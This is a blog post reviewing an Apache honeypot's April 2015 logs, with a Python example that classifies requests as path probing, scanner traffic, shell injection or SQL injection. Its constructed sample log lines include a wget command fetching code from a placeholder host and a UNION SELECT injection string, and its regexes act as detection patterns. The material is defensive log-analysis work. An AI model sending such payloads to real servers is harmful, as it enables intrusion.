This is the monthly review of my honeypot for April 2015. It is based on data taken from Apache log files. The tool used to optimize the data is mypyfwa.py, which is part of MyPythonApacheFirewall, a project I started on GitHub some time ago.
In its current state, the analyze script extracts requests based on four different types:
- PATH: the request contains more than three "/"
- SCANNER: one of the blacklisted scanners was used (Zeus, masscan, etc.)
- SHELLinjection: wget or curl was used within the query
- SQLinjection: a string including SQL syntax was used
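
The four types above, applied to Apache combined-format log lines. This is an added example, not the code of mypyfwa.py: the regular expressions, the two-entry scanner list (only the names mentioned above), matching scanners on the User-Agent, counting "/" in the URL path, and the sample lines are all assumptions made for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote, unquote_plus

# Apache "combined" log format: client IP, request line, User-Agent.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) '
                    r'(?P<target>[^"\s]+)[^"]*" \d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"')
# Assumed signatures: the post names only Zeus and masscan and shows no patterns.
SCANNERS = ("zeus", "masscan")
SHELL_RE = re.compile(r"\b(?:wget|curl)\b", re.I)
SQL_RE = re.compile(r"\bunion\b.+\bselect\b|\bselect\b.+\bfrom\b|\bor\b\s+\d+\s*=\s*\d+", re.I)

def classify(line):
    """Return (client_ip, [types]) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    # Decode %xx escapes and '+' first, so encoded payloads are still matched.
    path, query = unquote(path), unquote_plus(query)
    tags = []
    if path.count("/") > 3:          # PATH: more than three "/" (counted in the path)
        tags.append("PATH")
    if any(s in m.group("ua").lower() for s in SCANNERS):  # SCANNER: blacklisted UA
        tags.append("SCANNER")
    if SHELL_RE.search(query):       # SHELLinjection: wget or curl in the query
        tags.append("SHELLinjection")
    if SQL_RE.search(query):         # SQLinjection: SQL syntax in the query
        tags.append("SQLinjection")
    return m.group("ip"), tags

def summarize(lines):
    """Count how many parsed requests fall into each type."""
    counts = Counter()
    for parsed in filter(None, map(classify, lines)):
        counts.update(parsed[1])
    return counts

# Constructed sample lines (documentation IP ranges), not data from the honeypot.
SAMPLE = [
    '192.0.2.10 - - [12/Apr/2015:10:01:22 +0200] "GET /a/b/c/d/e.php HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Apr/2015:10:02:01 +0200] "GET / HTTP/1.0" 200 45 "-" "masscan/1.0"',
    '203.0.113.5 - - [12/Apr/2015:10:03:40 +0200] "GET /cgi-bin/t.cgi?x=wget+http://192.0.2.99/a HTTP/1.1" 404 209 "-" "-"',
    '203.0.113.9 - - [12/Apr/2015:10:04:02 +0200] "GET /index.php?id=1+UNION+SELECT+1,2 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [12/Apr/2015:10:05:00 +0200] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for entry in SAMPLE:
        print(classify(entry))
    print(summarize(SAMPLE))
```

A single request can carry several types at once, so the per-type counts can add up to more than the number of requests.
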
Attackers by Country Code